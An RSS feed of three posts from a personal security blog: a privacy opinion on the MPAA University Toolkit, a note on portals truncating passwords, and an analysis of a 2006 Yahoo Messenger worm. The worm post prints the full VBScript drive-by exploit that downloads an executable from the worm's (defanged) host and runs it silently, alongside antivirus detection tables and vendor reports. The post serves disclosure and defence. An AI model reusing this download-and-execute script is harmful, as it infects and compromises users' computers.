<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Ehsan Nourbakhsh’s Blog &#187; security</title>
	<atom:link href="http://www.nourbakhsh.ir/blog/category/security/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.nourbakhsh.ir/blog</link>
	<description></description>
	<lastBuildDate>Thu, 12 Jan 2012 22:12:11 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.1.3</generator>
		<item>
		<title>Internet Privacy: fact or fiction?</title>
		<link>http://www.nourbakhsh.ir/blog/2007/12/internet-privacy-fact-or-fiction/</link>
		<comments>http://www.nourbakhsh.ir/blog/2007/12/internet-privacy-fact-or-fiction/#comments</comments>
		<pubDate>Fri, 14 Dec 2007 06:28:25 +0000</pubDate>
		<dc:creator>Ehsan</dc:creator>
				<category><![CDATA[life]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[Web]]></category>

		<guid isPermaLink="false">http://www.nourbakhsh.ir/blog/archives/74</guid>
		<description><![CDATA[Reading a news article on Motion Picture Association of America (MPAA) being forced to take down University Toolkit for violation of GPL license, I started to think how deep our privacy is being violated. As Brian Kerb of Washington post describes in his article, the University Toolkit is essentially a monitoring software, just identifying people [...]]]></description>
			<content:encoded><![CDATA[<p>Reading a <a title="MPAA Takes University Toolkit Offline For GPL Violation" href="http://techdirt.com/articles/20071204/033515.shtml" target="_blank">news article</a> on Motion Picture Association of America (MPAA) being forced to take down University Toolkit for violation of GPL license, I started to think how deep our privacy is being violated. As Brian Kerb of Washington post describes in his article, the University Toolkit is essentially a monitoring software, just <a title="Privacy is not a crime" href="http://www.nourbakhsh.ir/blog/wp-content/uploads/2007/12/privacy-is-not-a-crimel.gif" rel="lightbox"><img title="Privacy is not a crime" src="http://www.nourbakhsh.ir/blog/wp-content/uploads/2007/12/privacy-is-not-a-crimel.thumbnail.gif" border="0" alt="Privacy is not a crime" align="right" /></a>identifying people with highest amount of network traffic with the file name, port address and traffic volume.</p>
<p>Beyond the irony of a copyright enforcing institution having to take down a software because of copyright violation, the software itself really annoys me. Imagine such observation shows some illegal activity going on the university network. Can this observation be used in a court of law? If not, why should such observation be done then. If yes, is it not a violation of &#8220;reasonable expectation of privacy&#8221;? If tapping someone&#8217;s internet activity is considered legal without a court order, same would hold for phone wire tapping. I am sure there is a problem in here, a huge problem!</p>
<ul>
<li><a title="Brian Krebs" href="http://blog.washingtonpost.com/securityfix/2007/11/mpaa_university_toolkit_opens_1.html" target="_blank">Washingtonpost: Brian Krebs: MPAA University &#8216;Toolkit&#8217; Raises Privacy Concerns</a></li>
<li><a title="The inetnert, computers and privacy on Wikipedia" href="http://en.wikipedia.org/wiki/Fourth_Amendment_to_the_United_States_Constitution#The_Internet.2C_computers.2C_and_privacy_in_relation_to_the_Fourth_Amendment" target="_blank">Wikipedia: The Internet, computers, and privacy in relation to the Fourth Amendment</a></li>
<li><a title="EFF on Privacy" href="http://www.eff.org/issues/privacy" target="_blank">Electronic Frontier Foundation on Privacy</a></li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.nourbakhsh.ir/blog/2007/12/internet-privacy-fact-or-fiction/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>bug or feature?</title>
		<link>http://www.nourbakhsh.ir/blog/2007/03/bug-or-feature/</link>
		<comments>http://www.nourbakhsh.ir/blog/2007/03/bug-or-feature/#comments</comments>
		<pubDate>Thu, 15 Mar 2007 16:56:29 +0000</pubDate>
		<dc:creator>Ehsan</dc:creator>
				<category><![CDATA[fun]]></category>
		<category><![CDATA[General]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[Web]]></category>

		<guid isPermaLink="false">http://www.nourbakhsh.ir/blog/archives/42</guid>
		<description><![CDATA[I just figured out that our web portal Galaxy, a uPortal in fact, and also our courseware WebCT both only use first eight characters of our passwords! This is interesting, since when choosing a password we are &#8220;forced&#8221; to use a password between 8 and 20, containing special characters and numbers. Is it only me [...]]]></description>
			<content:encoded><![CDATA[<p>I just figured out that our web portal <a href="http://galaxy.utdallas.edu">Galaxy</a>, a uPortal in fact, and also our courseware <a href="http://webct6.utdallas.edu" target="_blank">WebCT</a> both only use first eight characters of our passwords! This is interesting, since when choosing a password we are &#8220;forced&#8221; to use a password between 8 and 20, containing special characters and numbers.</p>
<p>Is it only me who thinks so,  or is it kind of silly?</p>
]]></content:encoded>
			<wfw:commentRss>http://www.nourbakhsh.ir/blog/2007/03/bug-or-feature/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>yahoo messenger worm</title>
		<link>http://www.nourbakhsh.ir/blog/2006/09/yahoo-messenger-worm/</link>
		<comments>http://www.nourbakhsh.ir/blog/2006/09/yahoo-messenger-worm/#comments</comments>
		<pubDate>Sun, 17 Sep 2006 21:43:06 +0000</pubDate>
		<dc:creator>ehsan</dc:creator>
				<category><![CDATA[security]]></category>
		<category><![CDATA[Tech Tips]]></category>

		<guid isPermaLink="false">http://test3.nourbakhsh.ir/blog/archives/23</guid>
		<description><![CDATA[Today I received two Yahoo messenger messages with very similar text, some thing like this: Toi di lang thang lan trong bong toi buot gia, ve dau khi da mat em roi? Ve dau khi bao nhieu mo mong gio da vo tan&#8230; Ve dau toi biet di ve dau? http://chendang.net&#8212;-/nguyen/ I don&#8217;t know what [...]]]></description>
			<content:encoded><![CDATA[<p>Today I received two Yahoo messenger messages with very similar text, some thing like this:</p>
<blockquote><p>Toi di lang thang lan trong bong toi buot gia, ve dau khi da mat em roi? Ve dau khi bao nhieu mo mong gio da vo tan&#8230; Ve dau toi biet di ve dau? http://chendang.net&#8212;-/nguyen/</p></blockquote>
<p>I don&#8217;t know what does it mean, and take no responsibility if it means something nasty. Also I&#8217;ve added some dashes to it. Anyway, the URL in this message points to a web page with only these sentences on it:</p>
<blockquote><p>Sao chẳng có gì để xem thế này hả trời !!!!!<br />
Emperor cũng làm được như mấy thằng kia thôi ^_^ keke !!!</p>
<p>Tất cả bây giờ chỉ là con số KHÔNG</p></blockquote>
<p>It is a worm which spreads itself using Yahoo! messenger, and infects unpatched IE users upon access to the www.chendnag.net website. You can find more information on its symptoms and removal on <a href="http://www.f-secure.com/v-descs/autoit_x.shtml">F-secure&#8217;s page</a> and <a href="http://vil.nai.com/vil/content/v_140628.htm">McAfee&#8217;s page</a>.</p>
<p><span id="more-17"></span></p>
<p>This is the VB script inside that page, an old IE exploit:</p>
<pre>
&lt;script language="VBScript"&gt;
    on error resume next
    dl = "http://www.chendang.net----/nguyen/love..exe"
    Set df = document.createElement("object")
    df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
    str="Microsoft.XMLHTTP"
    Set x = df.CreateObject(str,"")
    a1="Ado"
    a2="db."
    a3="Str"
    a4="eam"
    str1=a1&amp;a2&amp;a3&amp;a4
    str5=str1
    set S = df.createobject(str5,"")
    S.type = 1
    str6="GET"
    x.Open str6, dl, False
    x.Send
    fname1="bl4ck.com"
    set F = df.createobject("Scripting.FileSystemObject","")
    set tmp = F.GetSpecialFolder(2)
    fname1= F.BuildPath(tmp,fname1)
    S.open
    S.write x.responseBody
    S.savetofile fname1,2
    S.close
    set Q = df.createobject("Shell.Application","")
    Q.ShellExecute fname1,"","","open",0
&lt;/script&gt;</pre>
<p>The fact that I have received the PM means the worm does work. I will update here if I get more data, and know if it is an old one or is just gone wild. IE users, watch out!</p>
<p>P.S.: My antivirus did not detect the EXE file after downloading it. So: watch out ^ 2</p>
<h4>UPDATE:</h4>
<p>I checked the EXE file with <a href="http://www.virustotal.com">www.virustotal.com</a> and these are the results:</p>
<table border="1">
<tr>
<td>Antivirus</td>
<td>Version</td>
<td>Update</td>
<td>Result</td>
</tr>
<tr>
<td>AntiVir</td>
<td>7.2.0.16</td>
<td>09.18.2006</td>
<td>no virus found</td>
</tr>
<tr>
<td>Authentium</td>
<td>4.93.8</td>
<td>09.18.2006</td>
<td>no virus found</td>
</tr>
<tr>
<td>Avast</td>
<td>4.7.844.0</td>
<td>09.15.2006</td>
<td>no virus found</td>
</tr>
<tr>
<td>AVG</td>
<td>386</td>
<td>09.18.2006</td>
<td>no virus found</td>
</tr>
<tr>
<td>BitDefender</td>
<td>7.2</td>
<td>09.18.2006</td>
<td>no virus found</td>
</tr>
<tr>
<td>CAT-QuickHeal</td>
<td>8.00</td>
<td>09.18.2006</td>
<td>TrojanDownloader.Agent.axn</td>
</tr>
<tr>
<td>ClamAV</td>
<td>devel-20060426</td>
<td>09.18.2006</td>
<td>no virus found</td>
</tr>
<tr>
<td>DrWeb</td>
<td>4.33</td>
<td>09.18.2006</td>
<td>no virus found</td>
</tr>
<tr>
<td>eTrust-InoculateIT</td>
<td>23.72.127</td>
<td>09.16.2006</td>
<td>no virus found</td>
</tr>
<tr>
<td>eTrust-Vet</td>
<td>30.3.3084</td>
<td>09.18.2006</td>
<td>no virus found</td>
</tr>
<tr>
<td>Ewido</td>
<td>4.0</td>
<td>09.18.2006</td>
<td>no virus found</td>
</tr>
<tr>
<td>Fortinet</td>
<td>2.82.0.0</td>
<td>09.18.2006</td>
<td>no virus found</td>
</tr>
<tr>
<td>F-Prot</td>
<td>3.16f</td>
<td>09.18.2006</td>
<td>no virus found</td>
</tr>
<tr>
<td>F-Prot4</td>
<td>4.2.1.29</td>
<td>09.18.2006</td>
<td>no virus found</td>
</tr>
<tr>
<td>Ikarus</td>
<td>0.2.65.0</td>
<td>09.18.2006</td>
<td>no virus found</td>
</tr>
<tr>
<td>Kaspersky</td>
<td>4.0.2.24</td>
<td>09.18.2006</td>
<td>Trojan-Downloader.Win32.Agent.axn</td>
</tr>
<tr>
<td>McAfee</td>
<td>4854</td>
<td>09.18.2006</td>
<td>no virus found</td>
</tr>
<tr>
<td>Microsoft</td>
<td>1.1560</td>
<td>09.17.2006</td>
<td>no virus found</td>
</tr>
<tr>
<td>NOD32v2</td>
<td>1.1761</td>
<td>09.18.2006</td>
<td>no virus found</td>
</tr>
<tr>
<td>Norman</td>
<td>5.90.23</td>
<td>09.18.2006</td>
<td>no virus found</td>
</tr>
<tr>
<td>Panda</td>
<td>9.0.0.4</td>
<td>09.18.2006</td>
<td>no virus found</td>
</tr>
<tr>
<td>Sophos</td>
<td>4.09.0</td>
<td>09.18.2006</td>
<td>no virus found</td>
</tr>
<tr>
<td>Symantec</td>
<td>8.0</td>
<td>09.18.2006</td>
<td>no virus found</td>
</tr>
<tr>
<td>TheHacker</td>
<td>6.0.1.071</td>
<td>09.17.2006</td>
<td>no virus found</td>
</tr>
<tr>
<td>UNA</td>
<td>1.83</td>
<td>09.18.2006</td>
<td>no virus found</td>
</tr>
<tr>
<td>VBA32</td>
<td>3.11.1</td>
<td>09.18.2006</td>
<td>no virus found</td>
</tr>
<tr>
<td>VirusBuster</td>
<td>4.3.7:9</td>
<td>09.18.2006</td>
<td>no virus found</td>
</tr>
</table>
<p>Apparently only Kaspersky and CAT-QuickHeal(?) detect it. According to <a href="http://www.viruslist.com/en/viruses/encyclopedia?virusid=135476">Kaspersky&#8217;s viruslist.com</a>, it was first detected on September 17 2006, yesterday.</p>
<h4>UPDATE #2:</h4>
<p>After posting this blog entry, I submitted the worm sample (that EXE file it uses) to Avast! and F-Secure antivirus companies. Some hours later, F-secure reached me through e-mail and confirmed the fact it was a recently released worm:</p>
<blockquote><p>The file, love.exe (181 KB), is verified to be malicious. It will be detected as Trojan-Downloader.Win32.Agent.axn on our next database update.</p></blockquote>
<p>Their weblog has a note about it and another similar one <a href="http://www.f-secure.com/weblog/archives/archive-092006.html#00000973">here</a>.</p>
<p><a href="http://www.ruf.rice.edu/~rahmati/">Ahmad</a>, A friend of mine, had independently sent the file to McAfee AVERT. Some time later their automated system responded that the file was not a known virus, so it was &#8220;being forwarded to an AVERT Researcher for further analysis&#8221;. Some hours later, the promised researcher contacted him. He informed him that it was a new worm:</p>
<blockquote><p> A.V.E.R.T. Sample Analysis<br />
Issue Number: 2529850<br />
Virus Research Engineer: *********<br />
Identified: W32/YahLover.worm</p></blockquote>
<p>Also, a EXTRA.DAT file was attached to this email.Removal instruction based on this DAT file and McAfee antivirus software was contained in the email as well.</p>
<p>No news from Avert! has been heard yet <img src='http://www.nourbakhsh.ir/blog/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' />  Their latest update, today, does not detect the file to be infected.</p>
<p>When I tried to upload the file to a test Yahoo! mail message, their Symantec powered antivirus detected it as 	&#8220;W32.Yautoit&#8221;. Very good news for Yahoo! users.</p>
<p>And, by the way, this is the scan results of www.virustotal.com after 48 hours:</p>
<table border="1">
<thead>
<td>Antivirus</td>
<td>Version</td>
<td align="center">Update</td>
<td>Result</td>
<td>AntiVir</td>
<td>7.2.0.16</td>
<td align="center">09.20.2006</td>
<td>no virus found</td>
<td>Authentium</td>
<td>4.93.8</td>
<td align="center">09.20.2006</td>
<td>no virus found</td>
</tr>
<tr>
<td>Avast</td>
<td>4.7.844.0</td>
<td align="center">09.19.2006</td>
<td>no virus found</td>
</tr>
<tr>
<td>AVG</td>
<td>386</td>
<td align="center">09.20.2006</td>
<td>no virus found</td>
</tr>
<tr>
<td>BitDefender</td>
<td>7.2</td>
<td align="center">09.20.2006</td>
<td>Win32.Worm.Sohanat.E</td>
</tr>
<tr>
<td>CAT-QuickHeal</td>
<td>8.00</td>
<td align="center">09.20.2006</td>
<td>TrojanDownloader.Agent.axn</td>
</tr>
<tr>
<td>ClamAV</td>
<td>devel-20060426</td>
<td align="center">09.20.2006</td>
<td>no virus found</td>
</tr>
<tr>
<td>DrWeb</td>
<td>4.33</td>
<td align="center">09.20.2006</td>
<td>Trojan.DownLoader.12971</td>
</tr>
<tr>
<td>eTrust-InoculateIT</td>
<td>23.73.0</td>
<td align="center">09.20.2006</td>
<td>no virus found</td>
</tr>
<tr>
<td>eTrust-Vet</td>
<td>30.3.3088</td>
<td align="center">09.20.2006</td>
<td>Win32/Tiotua.A</td>
</tr>
<tr>
<td>Ewido</td>
<td>4.0</td>
<td align="center">09.20.2006</td>
<td>no virus found</td>
</tr>
<tr>
<td>Fortinet</td>
<td>2.82.0.0</td>
<td align="center">09.20.2006</td>
<td>W32/Agent.AXN!tr.dldr</td>
</tr>
<tr>
<td>F-Prot</td>
<td>3.16f</td>
<td align="center">09.20.2006</td>
<td>no virus found</td>
</tr>
<tr>
<td>F-Prot4</td>
<td>4.2.1.29</td>
<td align="center">09.20.2006</td>
<td>no virus found</td>
</tr>
<tr>
<td>Ikarus</td>
<td>0.2.65.0</td>
<td align="center">09.20.2006</td>
<td>no virus found</td>
</tr>
<tr>
<td>Kaspersky</td>
<td>4.0.2.24</td>
<td align="center">09.20.2006</td>
<td>Trojan.Win32.Autoit.x</td>
</tr>
<tr>
<td>McAfee</td>
<td>4856</td>
<td align="center">09.20.2006</td>
<td>W32/YahLover.worm</td>
</tr>
<tr>
<td>Microsoft</td>
<td>1.1560</td>
<td align="center">09.19.2006</td>
<td>no virus found</td>
</tr>
<tr>
<td>NOD32v2</td>
<td>1.1764</td>
<td align="center">09.20.2006</td>
<td>no virus found</td>
</tr>
<tr>
<td>Norman</td>
<td>5.90.23</td>
<td align="center">09.20.2006</td>
<td>Agent.AWVY</td>
</tr>
<tr>
<td>Panda</td>
<td>9.0.0.4</td>
<td align="center">09.20.2006</td>
<td>Adware/StartPage.AWD</td>
</tr>
<tr>
<td>Sophos</td>
<td>4.09.0</td>
<td align="center">09.20.2006</td>
<td>Troj/Tiotua-A</td>
</tr>
<tr>
<td>Symantec</td>
<td>8.0</td>
<td align="center">09.20.2006</td>
<td>no virus found</td>
</tr>
<tr>
<td>TheHacker</td>
<td>6.0.1.074</td>
<td align="center">09.20.2006</td>
<td>no virus found</td>
</tr>
<tr>
<td>UNA</td>
<td>1.83</td>
<td align="center">09.20.2006</td>
<td>Trojan.Win32.Autoit.4809</td>
</tr>
<tr>
<td>VBA32</td>
<td>3.11.1</td>
<td align="center">09.19.2006</td>
<td>Trojan-Downloader.Win32.Agent.axn</td>
</tr>
<tr>
<td>VirusBuster</td>
<td>4.3.7:9</td>
<td align="center">09.20.2006</td>
<td>no virus found</td>
</tr>
</table>
<p>As you may note, F-prot has not included this in their recent update, but McAfee has.</p>
<p>BTW: I&#8217;m wondering that what would happen if the worm writer used <a href="http://sunbeltblog.blogspot.com/2006/09/seen-in-wild-zero-day-exploit-being.html">this IE exploit</a> instead of this old exploit. This new one works even in the fully patched windows machine.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.nourbakhsh.ir/blog/2006/09/yahoo-messenger-worm/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>

